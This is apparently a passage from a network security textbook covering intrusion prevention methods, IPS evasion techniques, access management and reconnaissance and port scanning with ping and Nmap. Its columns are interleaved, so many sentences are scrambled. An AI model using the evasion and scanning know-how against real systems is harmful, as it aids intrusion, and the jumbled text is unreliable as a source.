covered, its signature is recorded and stored in a continuously growing dic-
tionary of signatures. Signature detection for IPS breaks down into two types:
Matching the subject description or attachment name of an email with
Exploit-facing signatures identify individual exploits by triggering on
details of a known or detected malicious email.
the unique patterns of a particular exploit attempt. The IPS can identify
specific exploits by finding a match with an exploit-facing signature in the Tracking the denial-of-service attack by counting the number of times a
traffic stream command is executed and matching it with known statistics of a similar
kind of attack.
Vulnerability-facing signatures are broader signatures that target the
underlying vulnerability in the system that is being targeted. These Matching a user activity prior to authentication or login with a known
signatures allow networks to be protected from variants of an exploit that attack pattern.
may not have been directly observed in the wild, but also raise the risk of
false-positives. The weakness of the signature method is that its highly likely a new type of
attack or intrusion attempt will be undetected by the IPS. If a known intrusion
attempt is carried out in step with a large time gap between each step, theres
a chance that such attacks might go unnoticed. And, if an attack signature is
Statistical anomaly detection takes samples of network traffic at random
slightly modified, its possible that an IPS might not detect it.
and compares them to a pre-calculated baseline performance level. When the
sample of network traffic activity is outside the parameters of baseline perfor-
mance, the IPS takes action to handle the situation.
Profile method
IPS was originally built and released as a standalone device in the mid-2000s.
In the advent of todays implementations, IDS is now commonly integrated In the profile method, the IPS collects a pattern of data stream flowing to and
into Unified Threat Management (UTM) solutions (for small and medium size from a computer system (or computer network) in controlled or trusted con-
companies) and next-generationfirewalls(at the enterprise level). ditions. This pattern is treated as a baseline profile and compared against the
real-time data stream patterns. A real-time data stream pattern that is found
to be suspiciously different from the baseline profile is treated as an attack
and preventive action is taken against it. A standard baseline profile can rep-
Signature method resent normal behaviour of things such as network connections, applications,
In the signature method, the IPS compares the real-time data stream patterns users and hosts.
with a huge database of attack patterns that have already been detected. For example, if a real-time data stream is observed to be accessing a crucial
In this process, each data packet is scanned, byte by byte, for a particular system file that wasnt accessed when the baseline profile was generated in
pattern or string that represents complete or partial code associated with a the controlled environment, this attempt is treated as malicious. The incident
known attack. The pattern or string could be anything, such as acommand is then reported through an alarm.
name or a specific set of characters.
The IPS can also be taught to recognize normal system behaviour through security to a host or computer network.
artificial intelligence. Because this method checks for deviations from normal
data traffic, it is also known as the anomaly-based method. Compared to the profile-based method, IPSs working on the signa-
ture-based method are more popular among corporations. Profile-based
The weakness of the profile method is that it can cause false alarms; a valid IPSs tend to generate a lot of false alarms that result in undesired data
change in the real-time data stream pattern could be misinterpreted as an traffic disruptions and extensive monitoring of the alarms generated.
attack. Also, it is hard to maintain a standard baseline profile as network to- The entire computer network setup would be at the mercy of the limit-
pologies change frequently. ed signature rules in a signature-based IPS. The time gap between the
detection of a new attack and the release of a software patch or update
from the vendor could be large enough to expose the computer network
Stateful protocol method to the new attack.
Data packets are wrapped with various protocol headers. Each layer of the Researchers and programmers are working to develop a superior IPS mod-
TCP/IP or Open Systems Interconnection (OSI) model adds the header of the el that would incorporate the best features of all three methods and detect
protocol (the protocol being used for that layer that is) to the received packet. known and unknown attacks with equal accuracy.
Protocols follow a standard document format known as Requests for Com-
ments (RFCs). An RFC completely explains the protocol and describes how it
should be used. The RFC forms the basis of the stateful protocol method. In Intrusion prevention systems can be classified into four different types:
this method, each protocol header is peeled apart and scanned for its con-
sistency with what its RFC specifies. A deviation from the RFC is considered 1. Network-based intrusion prevention system (NIPS): Monitors the
alarming, and an alert is raised. entire network for suspicious traffic by analysing protocol activity.
For example, a TCP packet with only SYN and FIN flags on, is a deviation from 2. Wireless intrusion prevention systems (WIPS): monitor a wireless
what the TCP RFC specifies. If a data packet with the TCP header contains network for suspicious traffic by analysing wireless networking proto-
both these flags on, then this needs to be reported.
cols.
In addition to monitoring the ideal behaviour of a protocol, an IPS also has
3. Network behaviour analysis (NBA): examines network traffic to iden-
intelligence about how a particular protocol is implemented in the real world
to make sure that a normally practiced RFC violation is not treated as a ma- tify threats that generate unusual traffic flows, such as distributed
licious attempt to breach computer security. denial of service (DDoS) attacks, certain forms of malware and policy
violations.
The stateful protocol method is like theprofile method. The difference is that
the profile method uses network- or host-specific rules while the stateful 4. Host-based intrusion prevention system (HIPS): an installed soft-
protocol method uses the protocol-specific rules described in corresponding ware package that monitors a single host for suspicious activity by
RFCs. It scans the protocol states and makes sure that the protocol is being
analysing events occurring within that host.
used in a proper way and is following valid state transitions.
What are the ways in which Intrusion Prevention Systems work?
Which method is better?
Signature based threat detection:Intrusion detection or preven-
There is no clear answer to this question, but here are some facts to keep in tion systems contain a large repository of signatures that help iden-
mind: tify attacks by matching attempts to known vulnerability patterns.
An IPS working on the signature method is able to detect only the at- Anomaly threat detection:Anomaly detection techniques protect
tack pattern of a known attack. All other types of attacks, even slight against first strike or unknown threats. This is done by comparing
variants of a known attack, are usually not detected. An IPS working the network traffic to a baseline to identify abnormal and potentially
on the stateful protocol method checks if the protocols are implemented harmful behavior. They basically look for statistical abnormalities in
according to standards. This approach enables an IPS to detect even the data traffic as well as protocol ambiguities and atypical applica-
unknown attacks that violate a protocol RFC rule. tion activities.
IPSs with capabilities of both the signature and protocol methods of Passive Network Monitoring:IPS can also be set to passively moni-
attack detection are getting popular. Using this hybrid method, an IPS tor network traffic at certain points and identify abnormal behavior/
can scan the protocol headers for alarming RFC violations and data deviation of certain security threshold parameters and report the
packets for known attack signatures. This approach provides enhanced same by generating reports/alerts (like email alerts) about the device
communications to the security administrator.
SYN Flood attacks: Attacker sends a lot of Please start a
communication with me packets to a server but doesnt send any
What are the important IPS performance metrics? follow up packets, thus wasting the memory resources that were
IPS performance metrics are measured in terms of: allocated for these requests by the server.
Dynamic alerting capability Http obfuscation:Number of attacks on web servers is carried out
by obfuscating URL characters (using hexadecimal numbers, for ex-
Lower false positives ample) which gives unwarranted access the attackers.
Threat blocking capability Port Scanning:This is an attempt by the attackers to find out which
ports are open on a specific host or multiple hosts on the network by
High availability/ redundancy/ speed of working scanning different ports. Once this information is obtained, attacks
Ability to correctly identify attacks and dropping packets accurately for known vulnerabilities for these services are tried.
ARP Spoofing: An Address Resolution Protocol (ARP) is used
Some IPS solutions offer the flexibility to implement different protection op-
to find a MAC address in a local network, when its IP address is
tions (rules) for different segments of the networks, which is especially useful
already known. A sending host usually broadcasts an ARP packet
for large networks. Some of them are capable of isolating the attack traffic to
(request) on the network requesting the MAC address of the host
a network segment and limiting the bandwidth to reduce the effect of network with a particular IP address and the same is sent back. By spoofing
threats. IPS helps identify and mitigate the following types of network threats. fake ARP requests from outside the network, the network traffic is
redirected to some other location with the information that might be
useful to the attackers.
Types of Network threats
CGI Attacks:It is possible for remote attackers to submit a malicious
ICMP Storms:High volumes of ICMP echoes may indicate maliciously web request containing Shell Meta characters (such as | etc.) to ex-
intended transmissions such as scanning for IP addresses etc. ecute arbitrary commands on a host running vulnerable CGI script.
If these commands are executed, an attacker can gain local or inter-
Ping to Death: A ping command is sent across a network to
active access to the host.
determine if another computer is active. A user to send an unusu-
ally large packet of information to the target computer, which might Buffer Overflow attacks:A buffer overflow occurs when a program
cause it to crash or go down temporarily, can misconfigure the ping or a process tries to store more data in a buffer than it was intended
command. to hold. This additional data can overflow into certain buffers and
can contain code to make specific actions to damage the users files,
SSL Evasion: An attacker tries to bypass the security device by
for example.
launching attacks using encrypted SSL tunnels as these are not
verified by the security devices. OS Fingerprinting attacks:OS Fingerprinting is a process of learn-
ing that Operating System is running on a device. Based on that
IP Fragmentation: Programs like Flag route intercepts, modifies
information, a hacker can perform a reconnaissance process on the
and rewrites egress traffic destined for a specific host thereby per-
network prior to launching an attack. The vulnerabilities of certain
petuating an attack.
Operating Systems are exploited with this information.
SMTP mass mailing attacks: SMTP DoS attacks from malformed
SMB Probes:A Server Message Block (SMB) protocol operates as an
email addresses cause unnecessary load on mail server.
application layer network protocol mainly used to provide shared
DoS/DDoS attacks: Attackers launch an attack on enterprise access to printers, files, serial ports etc. SMB probe attacks involving
network server by flooding it with a high number of connection re- file sharing or print sharing in MS Windows environment focus on
quests that appear genuine to the server. If the number of such con- scenarios where users put SMB protocol to work across different
nection requests exceeds the server request rate, it would prevent subnets across the Internet.
the genuine users from accessing the server. This is called a Denial
of Service (DoS) attack. In a Distributed Denial of Service attack,
attackers place malicious code on a lot of individual computers and
use them to simultaneously launch DoS attacks from various loca-
tions.
Network IPS Evasion Techniques Timing Attacks
Network attackers often use network IPS evasion techniques to attempt to Attackers can evade detection by performing their actions slower than nor-
bypass the intrusion detection, prevention, and traffic filtering functions pro- mal, not exceeding the thresholds inside the time windows the signatures
vided by network IPS sensors. Some commonly used network IPS evasion use to correlate different packets together. These evasion attacks can be
techniques are listed below: mounted against any correlating engine that uses a fixed time window
and a threshold to classify multiple packets into a composite event. An
Encryption and Tunnelling
example of this type of attack would be a very slow reconnaissance attack
Timing Attacks sending packets at the interval of a couple per minute. In this scenario, the
attacker would likely evade detection simply by making the scan possibly
Resource Exhaustion unacceptably long.
Traffic Fragmentation
Protocol-level Misinterpretation Resource Exhaustion
Traffic Substitution and Insertion A common method of evasion used by attackers is extreme resource con-
sumption, though this subtle method doesnt matter if such a denial is
against the device or the personnel managing the device. Specialized tools
Encryption and Tunnelling can be used to create a large number of alarms that consume the resourc-
es of the IPS device and prevent attacks from being logged. These attacks
One common method of evasion used by attackers is to avoid detection sim- can overwhelm what is known as the management systems or server, da-
ply by encrypting the packets or putting them in a secure tunnel. As dis- tabase server, or out-of-band (OOB) network. Attacks of this nature can
cussed now several times, IPS sensors monitor the network and capture the also succeed if they only overwhelm the administrative staff, who do not
packets as they traverse the network, but network based sensors rely on the have the time or skill necessary to investigate the numerous false alarms
data being transmitted in plaintext. When and if the packets are encrypted, that have been triggered.
the sensor captures the data but is unable to decrypt it and cannot perform
meaningful analysis. This is assuming the attacker has already established Intrusion detection and prevention systems rely on their ability to capture
a secure session with the target network or host. Some examples that can be packets off the wire and analyse them quickly, but this requires the sen-
used for this method of encryption and tunnelling are: sor to have adequate memory capacity and processor speed. The attacker
can cause an attack to go undetected through the process of flooding the
network with noise traffic and causing the sensor to capture unnecessary
packets. If the attack is detected, the sensor resources may be exhausted
Secure Shell (SSH) connection to an SSH server
but unable to respond within a timely manner due to resources being ex-
Client-to-LAN IPSec (IP Security) VPN (virtual private network) tunnel hausted.
Site-to-site IPSec VPN tunnel

SSL (Secure Socket Layer) connection to a secure website Traffic Fragmentation
There are other types of encapsulation that the sensor cannot analyze and Fragmentation of traffic was one of the early networks IPS evasion tech-
unpack that attackers often use in an evasion attack. For example, GRE niques used to attempt to bypass the network IPS sensor. Any evasion
(Generic Route Encapsulation) tunnels are often used with or without en- attempt where the attacker splits malicious traffic to avoid detection or
cryption. filtering is considered a fragmentation-based evasion by:
Bypassing the network IPS sensor if it does not perform any reassembly
at all.
Reordering split data if the network IPS sensor does not correctly order
it in the reassembly process.
Confusing the network IPS sensors reassembly methods which may target this is the first packet that actually reached it. The result is a com-
not reassemble split data correctly and result in missing the malicious promised host and the network IPS sensor ignored or missed the attack.
payload associated with it.
A few classic examples of fragmentation-based evasion are below:
Traffic Substitution and Insertion:
TCP segmentation and reordering, where the sensor must correctly re-
Another class of evasion attacks includes traffic substitution and inser-
assemble the entire TCP session, including possible corner cases, such
tion. Traffic substitution is when that attacker attempts to substitute pay-
as selective ACKs and selective retransmission.
load data with other data in a different format, but the same meaning. A
IP fragmentation, where the attacker fragments all traffic if the network network IPS sensor may miss such malicious payloads if it looks for data
IPS does not perform reassembly. Most sensors do perform reassem- in a particular format and doesnt recognize the true meaning of the data.
bly, so the attacker fragments the IP traffic in a manner that it is not Some examples of substitution attacks are below:
uniquely interpreted. This action causes the sensor to interpret it dif-
Substitution of spaces with tabs and vice versa, for example inside
ferently from the target, which leads to the target being compromised.
HTTP requests.
In the same class of fragmentation attacks, there is a class of attacks in-
Using Unicode instead of ASCII strings and characters inside HTTP re-
volving overlapping fragments. Inoverlapping fragments,the offset values
quests.
in the IP header dont match up, as they should; thus one fragment over-
laps another. The IPS sensor may not know how the target system will Exploit mutation, where specific malicious shell code (executable ex-
reassemble these packets and typically different operating systems handle ploit code that forces the target system to execute it) can be substituted
this situation differently. by completely different shell code with the same meaning and thus con-
sequences on the end host or target.
Exploit case sensitivity and changing case of characters in a malicious
Protocol-level Misinterpretation
payload, if the network IPS sensor is configured with case-sensitive sig-
Attackers also evade detection by causing the network IPS sensor to mis- nature.
interpret the end-to-end meaning of network protocols. In this scenario,
Insertion attacks act in the same manner in that the attacker inserts ad-
the traffic is seen differently from the target by the attacker causing the
ditional information that does not change the payload meaning into the
sensor either to ignore traffic that should not be ignored or vice versa. Two
attack payload. An example would be the insertion of spaces or tabs into
common examples are packets with bad TCP checksum and IP TTL (Time-
protocols that ignore such sequences.
to-live) attacks.
Unicodeprovides a unique identifier for every character in every language
A bad TCP checksum could occur in the following manner: An attack in-
to facilitate uniform computer representation of the worlds languages.
tentionally corrupts the TCP checksum of specific packets, thus confusing
The Unicode Consortium manages Unicode and has been adopted by the
the state of the network IPS sensor that does not validate checksums. The
majority of information technology industry leaders. Modern standards
attacker can also send a good payload with the bad checksum. The sensor
including Java, LDAP (Lightweight Directory Access Protocol), and XML
can process it, but most hosts will not. The attacker follows with a bad
require Unicode. Many operating systems and applications support
payload with a good checksum. From the network IPS sensor, this appears
Unicode. Also known as code points, Unicode can be represented by
to be a duplicate and will ignore it, but the end host will now process the
U+xxxx wherexis a hexadecimal digit.
malicious payload.
UTF-8 is the Unicode Transformation Format that serializes a Unicode
The IP TTL field in packets presents a problem to network IPS sensor be-
code point as a sequence of one to four bytes, as defined by the Unicode
cause there is no easy way to know the number of hops from the sensor
Consortium in its Corrigendum to Unicode 3.0.1. UTF-8 provides a way
to the end point of an IP session stream. Attackers can take advantage of
to encode Unicode points and still be compatible with ASCII, which is the
this through a method of reconnaissance by sending a packet that has a
common representation of text on the Internet.
very short TTL that will pass through the network IPS, but be dropped by a
router between the sensor and the target host due to a TTL equalling zero. Even though the Unicode specification dictates that the code points should
The attacker may then follow by sending a malicious packet with a long be treated differently there are times the application or operation system
TTL, which will make it to the end host or target. The packet looks like a can assign the same interpretation to different code points.
retransmission or duplicate packet from the attacker, but to the host or
Cisco supports the following variations of its Unicode de-obfuscation Cisco IPS Evasion Tools & Anti-Evasion Features
though there are many different implementations of Unicode decoding (in-
cluding some free interpretations): Evasion Method Evasion Tool Cisco IPS Anti-Evasion Features
Traffic Fragroute, Full session reassembly in STRING
Fragmentation fragrouter and SERVICE engines
Ambiguous bits - Some decoder implementations ignore certain bits
in the encoding. For example, an application will treat %A9 and %C9 Traffic Substitution Metasploit, Data normalization (de-obfuscation)
identically, discarding the fifth bit in a UTF8 two octet encoding. and Insertion Nessus in SERVICE engines
Protocol-level IP TTL Validation
Alternate code pages- Most Windows-based personal computers have
Misinterpretation
extended Latin code pages loaded. Typically when an extended character TCP Checksum Validation
is processed, it is normalized to an ASCII equivalent character. Timing Attacks Nmap Configuration intervals and Use
Self-referencing directories- The directory name test/././app refers to of CS MARS and similar tools for
the same path as test/app. correlation
Encryption and Any encrypted GRE tunnel inspection
Double Encoding- The code point passes through two levels of encoding. Tunneling protocol
The base encoding can be either a single octet UTF-8 or Unicode %U
encoding (without variation). The second encoding can encode each Resource Stick Smart dynamic event summarization
octet of the base encoding with any encoding method and variation. Exhaustion
When utilized, a single character can be encoded in many unique ways,
such as listed below:
Above summarizes the evasion methods, tools and the corresponding IPS
o % can be represented at least 140 ways. anti-evasion features available on the Cisco IPS sensors. Though they are
covered in the table, the anti-evasion features are listed below:
o x can be represented at least 1000 ways on average.
Smart and dynamic summarization of events to guard against too many
o U can be represented at least 3260 ways. alarms for high event rates.
Multiple directory delimiters- Some operating systems will treat / and IP TTL analysis and TCP checksum validation to guard against end-to-
\ equivalently as directory delimiters. Repeated directory delimiters end protocol-level traffic interpretation.
are also ignored.
Full session reassembly that supports the STRING and SERVICE en-
Uuencoded octets mixed with encoded octets in a UTF8 sequence- Any gines that must examine a reliable byte stream between two network
octet except the first octet in a UTF8 sequence can be a uuencoded val- endpoints.
ue. A good example of this is the value 0x123 represented in UTF-8 is
%E0%84%A3, but the 84 being an ASCII value can also be represented Configurable intervals for correlating signatures, or the use of an exter-
with a UTF-8 value. nal correlation that does not require real-time resources, such as Cisco
Security MARS.
Microsoft base-36- Older version of Microsofts UTF8 decoder accept 36
characters (A-Z and 0-9) as valid hexadecimal characters in the UTF8 Data normalization (de-obfuscation) inside SERVICE engines, where all
encoding instead of the normal 16 characters (A-F and 0-9). This is signatures convert network traffic data into a normalized, canonical
often referred to as a decoder implementation error. form being comparing it to the signature matching rules.
Inspection of traffic inside GRE tunnels to prevent evasion through tun-
nelling.
Tools: 3.5 User Management
A variety of free tools can be used for practice. Access in an information systems context has been defined simply as the
ability to do something with a computer resource (e.g. use, change or view).
Given this definition of access, user-access management therefore involves
Evader: managing who can use, change or view systems or information and the cir-
To test different evasion techniques, use the free tool Evader by the Helsin- cumstances in which such access is permissible.
ki-based security company Stonesoft, released on July 23, 2012. This tool The ISO 27001 Standard for Information Security Management Systems to
makes it possible to apply different evasion techniques to the attack. The tool have the following objectives defines user-access management:
is simply used to test different strategies and evasion techniques.
Ensure authorised user access
http://evader.stonesoft.com/
Prevent unauthorised access to information systems.
Libemu:
libemu is a small software package that offers x86 shellcode emulation capa- Expanding on the objectives from ISO 27001, a broad set of business-level
bilities. It can be used to test potential malicious payloads and identify Win32 objectives for user-access management can be defined as follows:
API calls. Paul Baecher and Markus Koetter released it in 2007. Allow only authorised users to have access to information and resources
http://libemu.carnivore.it Restrict access to the least privileges required by these authorised users to
fulfil their business role
Wireshark: Wireshark is a widely used software package for network traffic Ensure access controls in systems correspond to risk management objec-
capture and analysis. It can be used to analyse the traffic between the attack- tives
er, the IPS and the target host. Log user-access and system use, and ensure that the system can be audit-
http://www.wireshark.org/ ed in line with the systems risk profile.
To reach these objectives, the standard identifies four primary controls for
managing access rights. These are:
HxD
User registration: formal approval and documentation of user access to
HxD is a freely available hex-editor created by Mal Hrz. It can used to view information systems allows an organisation to track and verify the individ-
raw hex data conveniently. uals who have access to specific systems and services.
http://mh-nexus.de/en/hxd/ Privilege management: formalised processes for granting and revoking
privileges allow an organisation to track and audit changes to user-access
rights and determine the privilege levels of specific individuals.
User password/token management: as passwords remain commonplace,
standard processes for allocating and resetting user passwords reduce un-
necessary exposure of temporary or default passwords and minimise the
effectiveness of social engineering attacks against security administration
staff. Policies that mandate minimal levels of password length and com-
plexity also reduce the effectiveness of common password attacks. How-
ever, passwords alone no longer provide a satisfactory solution for critical
systems and services. The use of two factor models involving the use of
tokens and other credentials (e.g. biometrics) also requires similar holistic
management processes.
Review of user access rights: identify improperly assigned privileges and
allow an organisation to realign granted access rights with authorised ac-
cess rights.
As with a defence in depth strategy, user-access management cannot be ad-
dressed solely at a technical level. Rather, an effective layered approach to us-
Chapter 4.
er-access management requires controls to be implemented at the four levels of: Ethical Hacking Steps
Governance
People
Process Objectives:
Technology Foot-Printing & Reconnaissance
Scanning
Enumeration
System Hacking
Maintaining Access
Governance, people, process and technology
Covering Track
Similarly, the layered approach to defence in depth recommends controls be

Introduction:
implemented at multiple layers, including:
Ethical Hacking is a systematic process that consists of the following steps:
Network access controls
System-level access controls
Host-level access controls
Application access controls
Data access controls
Physical access controls
Password controls
3.6 Load Balancing

Load balancing is a core networking solution responsible for distributing in-
coming traffic among servers hosting the same application content. By bal-
ancing application requests across multiple servers, a load balancer prevents
any application server from becoming a single point of failure, thus improving
overall application availability and responsiveness. For example, when one
application server becomes unavailable, the load balancer simply directs all
new application requests to other available servers in the pool.
Load balancers also improve server utilization and maximize availability. Load
balancing is the most straightforward method of scaling out an application
server infrastructure. As application demand increases, new servers can be
easily added to the resource pool and the load balancer will immediately begin
sending traffic to the new server.
Load balancing is especially important for networks where its difficult to pre-
dict the number of requests that will be issued to a server. Busy Web sites
typically employ two or more Web servers in a load-balancing scheme. If one
server starts to get swamped, requests are forwarded to another server with
more capacity. Load balancing can also refer to the communication channels
themselves.
Reconnaissance: Sniffing the network is another means of passive reconnaissance and can
yield useful information such as IP address ranges, naming conventions, hid-
This step is also known as information gathering or foot printing.
den servers or networks and other available services on the system or network
The term reconnaissance comes from the military and means to actively seek
Active reconnaissance involves probing the network to discover individual
an enemys intentions by collecting and gathering information about an ene-
hosts, IP addresses and services on the network.
mys composition and capabilities via direct observation, usually by scouts or
military intelligence personnel trained in surveillance. In the world of ethical Both passive and active reconnaissance can lead to the discovery of useful
hacking, reconnaissance applies to the process of information gathering. information to use in an attack.
The first step of the hacking process is gathering information on a target. For example, its possible to find the type of web server and the operating sys-
tem (OS) version number that a target is using. This information may enable
Foot printing is defined as the process of creating a blueprint or map of an
a hacker to find vulnerability in that OS version and exploit the vulnerability
organizations network and systems. Information gathering is also known as
to gain more access.
footprinting an organization. Footprinting begins by determining the target
system, application or physical location of the target. Once this information is
known, specific information about the organization is gathered using non-in-
Footprinting Tools
trusive methods. For example, the organizations own web page may provide
a personnel directory or a list of employees, which may prove useful if the Footprinting can be done using hacking tools, either applications or websites,
hacker needs to use a social-engineering attack to reach the objective. Once which allow the hacker to locate information passively. By using these foot-
this information is compiled, it can give a hacker better insight into the or- printing tools, a hacker can gain some basic information of the target.
ganization, where valuable information is stored and how it can be accessed.
Information gathering can be done by the following means:
Here are some of the pieces of information to be gathered about a target
during footprinting:
Domain name 1. Extracting Archive of Website using (www.archive.org)
Network blocks 2. Using google earth or maps

3. Use of job sites to gather information about target
Network services and applications
4. Using search engines
System architecture
5. Domain name lookup
Intrusion detection system
6. Whois
Authentication mechanisms
7. Nslookup
Specific IP addresses
8. Sam Spade
Access control mechanisms
9. DNS Enumeration
Phone numbers
10. Traceroute
Contact addresses
Passive and Active Reconnaissance

Passive reconnaissance involves gathering information regarding a potential
target without the targeted individual or companys knowledge. Its usually
done using Internet searches or by Googling an individual or company to gain
information. This process is generally called information gathering. Social en-
gineering and dumpster diving are considered passive information-gathering
methods.
WHOIS
Archive.org
NsLookup
WayBack machine
SamSpade Scanning
After the reconnaissance and information-gathering stages have been com-
pleted, scanning is performed. During scanning, the hacker continues to
gather information regarding the network and its individual host systems.
Information such as IP addresses, operating system, services, and installed
applications can help the hacker determine which type of exploit to use in
hacking a system. Scanning is the process of locating systems that are alive
and responding on the network.
Types of Scanning
Scanning Type Purpose

Port scanning Determines open ports and services
Network scanning IP addresses

Vulnerability scanning Presence of known weaknesses
Traceroute
Purpose of Scanning
Detecting live machines on the target network
Discovering services running on targeted servers
Identifying which TCP and UDP services are running
Identifying the operating system
Identifying Active Machines

Before starting the scanning phase, you will need to identify active target
machines (that is, find out which machines are up and running). Ping can
be used for this task.
PING
Ping is a useful ICMP utility to measure the speed at which packets are moved
across the network, and to get some basic details about the target, like Time-
To-Live (TTL) details.
Ping helps in assessing network traffic by time stamping each packet. It can
also be used for resolving host names. Ping is a very simple utility. It sends
an echo request to a target host and then waits for the target to send an echo
reply back. Ping sends out an ICMP Echo Request packet and awaits an ICMP
Echo Reply message from an active machine:
Ping Sweeps
Pinging 192.168.0.1 with 32 bytes of data: Since its often time-consuming and tedious to ping every possible address
individually, a technique known as a ping sweep can be performed that will
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127 ping a batch of devices and help the attacker determine which ones are active.
Reply from 192.168.0.1: bytes=32 time=1ms TTL=127 Ping sweeps aid in network mapping by polling network blocks or IP address
ranges rather than individual hosts. Pinged hosts will often reply with an
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
ICMP Echo reply indicating that they are alive, whereas no response may
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127 mean the target is down or non-existent or that the ICMP protocol is disabled.
Ping statistics for 192.168.0.1: Ping Tools

In addition to the ping utility included with your operating system, there are
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
a variety of ping tools available. Several vendors offer ping tools that provide
Approximate round trip times in milli-seconds: various levels of functionality and extra features, such as ping sweep ability:
Minimum = 1ms, Maximum = 2ms, Average = 1ms WS_PingProPack (www.ipswitch.com)

NetScan Tools (www.nwpsw.com)
If the target isnt up and running, however, it returns a Request
Hping (www.hping.org/download.html)
timed out message:
icmpenum (www.nmrc.org)
Pinging 10.1.1.1 with 32 bytes of data:
Nmap
Request timed out.
Nmap can perform ping sweep
Request timed out.
Request timed out.
Nmap Ping sweeps
Tools that can be used to detect ping sweeps of a network are very useful. 2. A closed port is not accepting connectivity.
Some of these ping sweep detection utilities include:
3. A filtered port has some type of network device, like a firewall, prevent-
Network-based IDS (www.snort.org) ing the port from being probed to discover whether its open or closed.
Genius (www.indiesoft.com)
The Nmap utility has the ability to determine the state of a port. Port scanning
BlackICE (www.networkice.com) is the process of connecting to TCP and UDP ports for the purpose of finding
Scanlogd (www.openwall.com/scanlogd) what services and applications are running on the target device.
TCP provides a full-duplex, connection-oriented, reliable protocol. Incom-
Identifying Open Ports and Available Services ing TCP packets are sequenced to match the original transmission sequence
numbers. Because any lost or damaged packets are retransmitted, TCP is very
Now that youve learned the network range and acquired a list of active com- costly in terms of network overhead and is slower than UDP. Reliable data
puters, the next step is to locate any open ports on those machines and iden- transport is addressed by TCP to ensure that the following goals are achieved:
tify the services running that might give you a route in. Techniques to locate
these ports and discover services include:
Port scanning An acknowledgment is sent back to the sender upon the receipt of de-
livered segments.
Banner grabbing
War dialing Any unacknowledged segments are retransmitted.
War walking Segments are sequenced back in their proper order upon arrival at their
destination.
Port Scanning A manageable data flow is maintained in order to avoid congestion,
overloading, and data loss.
Port scanning is the process of identifying open and available TCP/IP ports
on a system. Port-scanning tools enable a hacker to learn about the services
available on a given system. Each service or application on a machine is as-
sociated with a well-known port number. UDP is similar to TCP but gives only a best-effort delivery, which means it
offers no error correction, does not sequence the packet segments, and does
Port Numbers are divided into three ranges: not care in which order the packet segments arrive at their destination. Con-
Well-Known Ports: 0-1023 sequently, its referred to as an unreliable protocol. UDP does not create a
virtual circuit and does not contact the destination before delivering the data.
Registered Ports: 1024-49151
Therefore, it is also considered a connectionless protocol. UDP imposes much
Dynamic Ports: 49152-65535 less overhead than TCP, however, which makes it faster for applications that
can afford to lose a packet now and then, such as streaming video or audio.
For example, a port-scanning tool that identifies port 80 as open indicates a

web server is running on that system.
Port scanning is used to find out the vulnerabilities in the services listing on
a port.
There are so many automatic port scanners available on the Internet, but the
most common and popular tool is nmap. Nmap is a network mapper and a
powerful, flexible, freely available and easy to use tool. It is available for both
Linux and Windows based operating system.
Ports have three states: open, closed and filtered:

1. An open port is accepting communications from the target device.
Difference between TCP and UDP protocol for establishing a connection (three-way handshake), restarting a failed con-
nection, and finishing a connection is part of the protocol. These protocol no-
tifications are called flags. TCP contains ACK, RST, SYN, URG, PSH and FIN
flags. The following list identifies the function of the TCP flags:
List TCP Communication Flag Types

SYNSynchronize initiates a connection between hosts.
ACKAcknowledge Established connection between hosts.
PSHPush System is forwarding buffered data.
URGUrgent Data in packets must be processed quickly.
FINFinish No more transmissions.
RSTReset Reset the connection.
Lets look at some TCP-based scanning techniques:
TCP three-way handshake
Three segments are exchanged between the sender and receiver for a reliable SYN: A SYN or stealth scan is also called a half-open scan because it doesnt
TCP connection to get established. complete the TCP three-way handshake. A hacker sends a SYN packet to the
target; if a SYN/ACK frame is received back, then its assumed the target
Manipulation of TCPs three-way handshake is the basis for most TCP based
would complete the connect and the port is listening. If an RST is received
scanning. As shown in Figure, in its basic form, the TCP three-way hand-
back from the target, then its assumed the port isnt active or it is closed. The
shake is broken into the following steps:
advantage of the SYN stealth scan is that fewer IDS systems log this as an
1. SYN sent from client attack or connection attempt.
2. SYN/ACK sent from server
3. ACK sent from client
XMAS: Other techniques that have been used consist of XMAS scans where
all flags in the TCP packet are set. XMAS scans send a packet with the FIN,
URG and PSH flags set. If the port is open, there is no response; but if the post
is closed, the target responds with an RST/ACK packet. XMAS scans work
only on target systems that follow the RFC 793 implementation of TCP/IP and
dont work against any version of Windows.
FIN: A FIN scan is similar to an XMAS scan but sends a packet with just the
FIN flag set. FIN scans receive the same response and have the same limita-
tions as XMAS scans. The typical TCP scan attempts to open connections.
TCP Three Way Handshaking Another technique sends erroneous packets at a port, expecting that open
listening ports will send back different error messages than closed ports. The
scanner sends a FIN packet, which should close a connection that is open.
In order to complete the three-way handshake and make a successful connec- Closed ports reply to a FIN packet with a RST. If no service is listening at the
tion between two hosts, the sender must send a TCP packet with synchronize target port, the operating system will generate an error message. If a service is
(SYN) bit set. Then, the receiving system responds with a TCP packet with listening, the operating system will silently drop the incoming packet.
synchronize (SYN) and acknowledge (ACK) bit set to indicate that the host Therefore, silence indicates the presence of a service at the port. However,
is ready to receive data. The source system sends a final packet with the ac- since packets can be dropped accidentally on the wire or blocked by firewalls,
knowledge (ACK) bit set to indicate the connection is complete and data is this isnt a very effective scan.
ready to be sent. Because TCP is a connection-oriented protocol, a process
NULL: NULL scans where none of the bits are set. A NULL scan is also similar
to XMAS and FIN in its limitations and response, but it just sends a packet
with no flags set.
IDLE: An IDLE scan uses a spoofed IP address to send a SYN packet to a

target. Depending on the response, the port can be determined to be open
or closed. IDLE scans determine port scan response by monitoring IP header
sequence numbers.
All three of these scans and others are available with the NMap scanning tool.
Nmap tool:
There are so many automatic port scanners available on the Internet, but
the most common and popular tool is Nmap. Nmap is a network mapper and
a powerful, flexible, freely available and easy to use tool. It is available for
both Linux and Windows based operating systems.
Nmap is a free open source tool that quickly and efficiently performs ping
sweeps, port scanning, service identification, IP address detection, and op-
Nmap Scans
erating system detection. Nmap has the benefit of scanning of large number
of machines in a single session. It is supported by many operating systems,
including UNIX, Windows and Linux.
To perform an Nmap scan, at the Windows command prompt, type Nmap
IPaddress followed by any command switch used to perform specific type of
Nmap has numerous command switches to perform different types of scans. scans. For example, to scan the host with the IP address 192.168.0.1 using a
TCP connects scan type, enter the command:
Nmap Command Scan Performed
Nmap 192.168.0.1 sT
-sT TCP connect scan
-sS SYN scan Port scans countermeasures
